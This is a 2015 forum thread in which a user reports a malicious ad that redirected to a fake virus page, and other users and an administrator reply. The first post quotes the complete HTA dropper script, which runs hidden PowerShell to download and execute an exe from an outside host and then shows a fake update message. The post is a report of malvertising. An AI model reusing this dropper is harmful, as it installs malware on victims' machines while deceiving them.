neufuse Veteran Posted December 28, 2015 Veteran Share Posted December 28, 2015 (edited) I'm not sure what ad did this, but when ad's loaded (only twice now out of all the times i come here in the past week) on this site I got redirected to a "you have a virus" scam page and I had an .HTA file try to run with this payload <script> moveTo(-100,-100);resizeTo(0,0); a=new ActiveXObject('Wscript.Shell'); a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\mess.exe';(New-Object System.Net.WebClient).DownloadFile('http://955.c8542ip.mixiaportaldovaletudo.net/145127282735050/patch.exe',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false); close(); </script> this is the second time I've seen this happen on this site's main page after ad's loaded on two different systems.. one in IE11 one in chrome The Evil Overlord 1 Share Link to comment Share on other sites More sharing options...
The Evil Overlord Posted December 28, 2015 Share Posted December 28, 2015 (edited) Maybe Neowin's trying to tell you something I personally hate the ones that auto play audio (The 'Think' ads) ((Worst part, that ad's now on some sort of loop, and no refreshing or re navigating is fixing it, at this rate, I may as well install an ad blocker also)) Link to comment Share on other sites More sharing options...
Torolol Posted December 28, 2015 Share Posted December 28, 2015 i got HTTP 502 error when i want to download that file for antivirus inspection Link to comment Share on other sites More sharing options...
binaryzero Posted December 28, 2015 Share Posted December 28, 2015 Seems legit. Link to comment Share on other sites More sharing options...
Steven P. Administrators Posted December 28, 2015 Administrators Share Posted December 28, 2015 Reporting this, will let you know the results. Link to comment Share on other sites More sharing options...
neufuse Veteran Posted December 28, 2015 Author Veteran Share Posted December 28, 2015 12 hours ago, Torolol said: i got HTTP 502 error when i want to download that file for antivirus inspection yeah I tried it yesterday too and got the same thing... but to me even if its not getting the file it is still concerning an ad would be doing this I wanted to see what the file actually was myself... 8 hours ago, Steven P. said: Reporting this, will let you know the results. cool, thanks! Link to comment Share on other sites More sharing options...
Recommended Posts